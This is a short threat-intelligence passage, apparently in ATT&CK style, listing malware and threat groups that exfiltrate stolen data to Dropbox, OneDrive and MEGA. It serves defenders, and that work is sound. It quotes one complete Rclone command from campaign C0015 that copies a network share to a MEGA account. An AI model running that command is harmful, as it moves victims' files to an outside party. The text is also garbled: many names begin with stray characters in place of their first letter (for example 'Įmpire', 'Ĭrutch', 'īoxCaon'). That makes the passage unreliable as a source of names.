

Įmpire can use Dropbox for data exfiltration. Įarth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA. Ĭrutch has exfiltrated stolen data to Dropbox. ĬreepyDrive can use cloud services including OneDrive for data exfiltration.

Ĭonfucius has exfiltrated victim data to cloud storage service accounts. Ĭlambling can send files from a victim's machine to Dropbox. Ĭhimera has exfiltrated stolen data to OneDrive accounts. ĭuring C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command rclone.exe copy -max-age 2y "\\SERVER\Shares" Mega:DATA -q -ignore-existing -auto-confirm -multi-thread-streams 7 -transfers 7 -bwlimit 10M. īoxCaon has the capability to download folders' contents on the system and upload the results back to its Dropbox drive. BoomBox can upload data to dedicated per-victim folders in Dropbox.
